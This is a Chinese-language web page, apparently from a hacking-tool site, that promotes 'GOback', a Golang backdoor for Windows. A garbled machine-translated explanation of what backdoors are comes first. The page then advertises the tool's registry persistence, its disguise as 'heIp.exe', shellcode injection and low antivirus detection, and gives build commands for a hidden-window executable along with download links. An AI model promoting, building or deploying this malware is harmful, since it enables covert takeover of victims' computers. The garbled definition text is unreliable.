目录导航
什么是后门
后门是绕过计算机、产品、嵌入式设备中的正常身份验证或加密的一种典型的隐蔽方法(例如.a家庭路由器),或其实施例(例如。密码系统、算法、芯片组的一部分,甚至是一台“homunculus计算机”—一台微型计算机内部的计算机,如英特尔AMT技术中的计算机)。[1][2]后门通常用于确保远程访问计算机的安全,或在加密系统中获取对明文的访问。从那里,它可以被用来访问特权信息,如密码、损坏或删除硬盘上的数据,或在autoschediastic网络中传输信息。
后门可以是程序的隐藏部分,[3]一个单独的程序(例如。后孔板可能通过rootkit破坏系统)、硬件固件中的代码、[4]或操作系统的某些部分(如Windows)。[5][6][7]特洛伊木马可用于在设备中创建漏洞。特洛伊木马可能看起来是一个完全合法的程序,但在执行时,它会触发一个可能安装后门的活动。[8]虽然有些是秘密安装的,但其他后门是故意的,并且广为人知。这类后门有“合法”的用途,比如为制造商提供恢复用户密码的方法.
GOback后门特色:
① 带有Win32 API调用的Golang
② 注册编辑以保持持久性
③ 将自身复制到名称为heIp.exe的其他位置
④ 病毒总数的检出率低(7/71) [?] [?] [?] [?] [?]
⑤ 在受感染机器中进行32位进程搜索
⑥ Shellcode注入
GOback后门安装方法
go get -u github.com/TheTitanrain/w32
go build -ldflags="-H windowsgui" -o main.exe main.goShellcode
您必须使用main.go中的depends编辑shellcode部分,如下图所示。
GOback项目地址:
GitHub :https://github.com/pioneerhfy/GOback
如果下载GitHub下载失败,请访问如下连接进行下载
https://w.ddosi.workers.dev/github/GOback-master.zip
GO下载安装
windows: https://dl.google.com/go/go1.14.2.windows-amd64.msi
linux : https://dl.google.com/go/go1.14.2.linux-amd64.tar.gz
Apple Mac OS : https://dl.google.com/go/go1.14.2.darwin-amd64.pkg
————————-
雨苁网盘下载:
https://w.ddosi.workers.dev/